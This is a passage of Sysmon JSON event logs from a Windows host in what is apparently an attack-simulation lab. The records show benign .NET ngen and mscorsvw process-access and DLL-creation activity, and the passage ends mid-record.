{"EventTime":"2020-08-01 08:05:46","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7604,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:46.663\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-225A-5F25-0000-0010B4FC0D00}\r\nTargetProcessId: 4348\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:46.663","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-225A-5F25-0000-0010B4FC0D00}","TargetProcessId":"4348","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:49","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7605,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:05:49.710\r\nProcessGuid: {41C8662E-225A-5F25-0000-0010B4FC0D00}\r\nProcessId: 4348\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\10fc-0\\ReachFramework.dll\r\nCreationUtcTime: 2020-08-01 08:05:49.710","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:05:49.710","ProcessGuid":"{41C8662E-225A-5F25-0000-0010B4FC0D00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\10fc-0\\ReachFramework.dll","CreationUtcTime":"2020-08-01 08:05:49.710","EventReceivedTime":"2020-08-01 08:05:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:49","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7606,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:49.788\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2231-5F25-0000-00101A690B00}\r\nTargetProcessId: 2004\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:49.788","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2231-5F25-0000-00101A690B00}","TargetProcessId":"2004","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:49","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7607,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:49.788\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2231-5F25-0000-00101A690B00}\r\nTargetProcessId: 2004\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:49.788","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2231-5F25-0000-00101A690B00}","TargetProcessId":"2004","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:49","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7608,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:49.804\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-225D-5F25-0000-00103E0D0E00}\r\nTargetProcessId: 2004\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:49.804","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-225D-5F25-0000-00103E0D0E00}","TargetProcessId":"2004","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:49","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7609,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:49.835\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2242-5F25-0000-00104F200C00}\r\nTargetProcessId: 2152\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:49.835","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2242-5F25-0000-00104F200C00}","TargetProcessId":"2152","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:49","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7610,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:49.835\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2242-5F25-0000-00104F200C00}\r\nTargetProcessId: 2152\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:49.835","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2242-5F25-0000-00104F200C00}","TargetProcessId":"2152","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:49","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7611,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:49.835\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2242-5F25-0000-00104F200C00}\r\nTargetProcessId: 2152\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:49.835","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2242-5F25-0000-00104F200C00}","TargetProcessId":"2152","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:49","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7612,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:49.882\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-225D-5F25-0000-001093140E00}\r\nTargetProcessId: 4652\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: 